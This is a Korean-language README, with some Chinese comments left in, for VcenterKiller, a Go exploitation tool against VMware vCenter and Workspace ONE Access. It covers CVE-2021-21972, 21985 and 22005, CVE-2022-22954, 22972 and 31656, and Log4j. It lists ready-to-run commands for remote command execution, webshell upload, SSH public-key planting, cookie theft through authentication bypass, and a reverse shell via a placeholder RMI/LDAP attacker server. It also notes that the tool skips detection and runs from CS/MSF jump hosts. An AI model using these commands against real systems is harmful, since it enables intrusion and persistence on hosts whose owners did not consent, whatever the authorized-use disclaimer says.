
Vcenter 대상 종합 활용 도구로, 현재 가장 주류인 CVE-2021-21972, CVE-2021-21985, CVE-2021-22005, One Access의 CVE-2022-22954, CVE-2022-22972/31656 및 log4j를 포함합니다. 원클릭 웹쉘 업로드, 명령 실행 또는 공개키 업로드를 통한 SSH 비밀번호 없는 연결을 제공합니다.
로컬에 취약점 환경을 구축한 분들은 vckiller로 log4j를 검증하면 기본적으로 실패합니다. VMware 가상 머신 환경에서 NAT 모드를 사용하면 검증 모듈의 외부 네트워크 카드가 127.0.0.1로 판단되어 대상이 접근하는 LDAP 서버 주소가 127.0.0.1로 바뀌어 검증이 실패합니다 😏
버그가 발견되면 issue를 제기해 주세요. 이 도구는 단순히 편의를 위해 작성되었으며, 특별히 대단한 것은 없습니다.
Vcenter를 위한 종합 검증 도구입니다. 현재 가장 주류인 CVE-2021-21972, CVE-2021-21985 및 CVE-2021-22005를 포함하며, 원클릭 웹쉘 업로드, 명령 실행 또는 공개키 업로드 후 SSH 연결 기능을 제공합니다. 또한 Apache Log4j CVE-2021-44228 취약점에 대한 Vcenter에서의 탐지 및 활용(예: 명령 실행 및 출력 획득)을 지원합니다 (ldap 악성 서버 필요). 이제는 별도로 ldap 서버를 시작할 필요가 없습니다. jndi-injection 도구를 기반으로 직접 활용 방식을 만들었습니다. Vcenter에서 사용하는 미들웨어는 Tomcat이므로 TomcatBypass 활용 체인을 바로 사용하면 됩니다.
일반적으로 Vcenter는 내부망에 위치하며 취약점 특징도 흔합니다. fscan 같은 도구로 스캔하면 바로 드러납니다. 따라서 VcenterKiller는 대상에 취약점이 있는지 탐지하는 용도가 아니라 직접 익스플로잇을 시도합니다. 일반적으로 CS/MSF를 통해 점프 호스트에서 실행되므로, 그 외의 불필요한 출력은 제거했습니다.
왜 GO를 사용했는가? Python은 작성은 편리하지만 사용하기 까다롭고, 각종 의존성 라이브러리가 필요하며 컴파일 시 용량이 큽니다. C#은 크로스 플랫폼이 불가능하여 작성하다가 포기했습니다.
go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 //get cookie
./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656
본 도구는 합법적으로 승인된 기업 보안 구축 행위(예: 기업 내부 공격 방어 훈련, 취약점 검증 및 재테스트)에만 사용됩니다. 도구의 사용성을 테스트하려면 직접 타겟 환경을 구축하시기 바랍니다.
이 도구를 사용하여 검사할 때는 해당 행위가 현지 법률 및 규정을 준수하고 충분한 승인을 받았는지 확인해야 합니다. 비승인 대상에는 사용하지 마십시오.
본 도구를 사용하는 과정에서 불법 행위가 발생할 경우 이에 대한 모든 책임은 사용자 본인에게 있으며, 당사는 어떠한 법적 책임도 지지 않습니다.
V1.0 출시
V1.1 CVE-2021-21985에 대해 rmi를 사용한 리버스 셸 기능 추가, 단 rmi 서버(예: jndi-injection-exploit)를 시작해야 함
V1.2 Vcenter에 대한 log4j 탐지 및 검증 기능 추가
V1.3 VMware WorkSpace One Access에 대한 취약점 검증 기능 추가 (CVE-2022-22954 원격 명령 실행, CVE-2022-22972, CVE-2022-31656 인증 우회)
V1.3.1 log4j 탐지 시 포트를 무시하던 문제 수정, 일부 서비스는 기본 443 포트를 변경함
V1.3.2 log4j 활용 방식 변경, tomcatbypassEcho 방식으로 명령 실행 및 출력 획득. vcenter 7.0 linux에서 테스트 통과
V1.3.3 6.7과 7.0 버전의 차별화된 활용 추가, 7.0은 반드시 tomcatbypass 사용, 6.7은 일반 basic 사용 가능
v1.3.4 log4j 검증 로직 변경, 현재 로직은 5회 동안 다른 payload 무차별 전송, 에코가 있으면 있고 없으면 없음
v1.3.5 log4j의 Jndi-Injection-Exploit 의존성 제거, 명령 직접 실행 및 출력 획득 가능
v1.3.6 21972의 SSH 기능 수정 및 기타 세부 사항 최적화
v1.3.7 프록시 기능 추가, http 및 socks 지원
v1.3.8 아직 시작하지 않음, 기능 추가 고려 중...